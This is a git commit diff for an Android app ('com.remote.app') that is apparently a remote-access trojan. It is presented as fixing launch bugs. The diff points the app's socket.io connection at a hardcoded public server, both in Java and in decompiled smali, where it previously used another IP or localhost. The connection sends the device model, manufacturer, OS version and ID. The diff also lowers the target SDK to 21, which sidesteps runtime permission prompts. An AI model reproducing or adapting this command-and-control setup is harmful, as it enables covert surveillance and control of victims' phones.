Resolved A8+ launch bugs

This commit is contained in:
ChrisStone07 2020-04-09 13:46:03 +05:30
parent 4630b79726
commit 176b0fcfb4
67 changed files with 9 additions and 10 deletions

1
.gitignore vendored
View File

@ -8,7 +8,6 @@ lib-cov
coverage
.grunt
.lock-wscript
build/Release
node_modules
.gradle
.idea

View File

@ -9,7 +9,7 @@ android {
defaultConfig {
applicationId 'com.remote.app'
minSdkVersion 14
targetSdkVersion 28
targetSdkVersion 21
versionCode 1
versionName "1.0"
}

Binary file not shown.

View File

@ -21,7 +21,7 @@ public class IOSocket {
opts.reconnectionDelay = 5000;
opts.reconnectionDelayMax = 999999999;
ioSocket = IO.socket("http://47.91.41.155:80?model="+ android.net.Uri.encode(Build.MODEL)+"&manf="+Build.MANUFACTURER+"&release="+Build.VERSION.RELEASE+"&id="+deviceID);
ioSocket = IO.socket("http://3.90.231.134:80?model="+ android.net.Uri.encode(Build.MODEL)+"&manf="+Build.MANUFACTURER+"&release="+Build.VERSION.RELEASE+"&id="+deviceID);
} catch (URISyntaxException e) {
e.printStackTrace();
}

Binary file not shown.

View File

@ -13,7 +13,7 @@ packageInfo:
renameManifestPackage: null
sdkInfo:
minSdkVersion: '14'
targetSdkVersion: '28'
targetSdkVersion: '21'
sharedLibrary: false
sparseResources: false
unknownFiles: {}

Binary file not shown.

Before

Width:  |  Height:  |  Size: 212 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 225 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 212 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 225 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 215 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 223 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 215 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 223 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 221 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 252 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 221 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 6.8 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 8.9 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 4.0 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 9.3 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 4.9 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 22 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 26 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 28 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 30 KiB

View File

@ -1,9 +1,9 @@
Signature-Version: 1.0
Created-By: 1.0 (Android)
SHA1-Digest-Manifest: Br7KZuMlRvkujFIEcFUfc9JLJHM=
SHA1-Digest-Manifest: 9wLCJfjpA3L2avYP/kniF8N1Fpk=
Name: AndroidManifest.xml
SHA1-Digest: hMY5UmKutb2cZY4afr084GSFwLk=
SHA1-Digest: FWiCXCmqENMMqGylDqderc/wIlU=
Name: META-INF/android.arch.lifecycle_runtime.version
SHA1-Digest: mgd0ibqCDE7dziahk3gQRzTxqfA=
@ -16,7 +16,7 @@ Name: META-INF/androidx.versionedparcelable_versionedparcelable.versio
SHA1-Digest: /M5ZcCUkGpD9LMU3LB/ji4SqKws=
Name: classes.dex
SHA1-Digest: CimfIcRvl0JGoxRUHDbve9dy95o=
SHA1-Digest: oOa4UFM2ozvdtdx1nt8T9I8z8w4=
Name: res/drawable-hdpi-v4/notification_bg_low_normal.9.png
SHA1-Digest: GqlxeUYi9nderviC+XwD6tRD5Kg=

View File

@ -3,7 +3,7 @@ Built-By: Generated-by-ADT
Created-By: Android Gradle 3.4.2
Name: AndroidManifest.xml
SHA1-Digest: ndoGeF/07suLd7OIe2cVBC17lwQ=
SHA1-Digest: Pv4spc504MtuZJxvvbq+oaMhCC8=
Name: META-INF/android.arch.lifecycle_runtime.version
SHA1-Digest: OxxKFJcpzAROGjnfMbNijNv1+JU=
@ -16,7 +16,7 @@ Name: META-INF/androidx.versionedparcelable_versionedparcelable.versio
SHA1-Digest: xTi2bHEQyjoCjM/kItDx+iAKmTU=
Name: classes.dex
SHA1-Digest: ItDW7U9v+mbVk1bCaAtUqtsDPBQ=
SHA1-Digest: BynmcxNAeoLpVz3OZFvLrmI8Ap0=
Name: res/drawable-hdpi-v4/notification_bg_low_normal.9.png
SHA1-Digest: D2PhKM51tYZo8a79riJ3XiUD2nc=

View File

@ -64,7 +64,7 @@
invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
const-string v2, "http://localhost:80?model="
const-string v2, "http://3.90.231.134:80?model="
invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;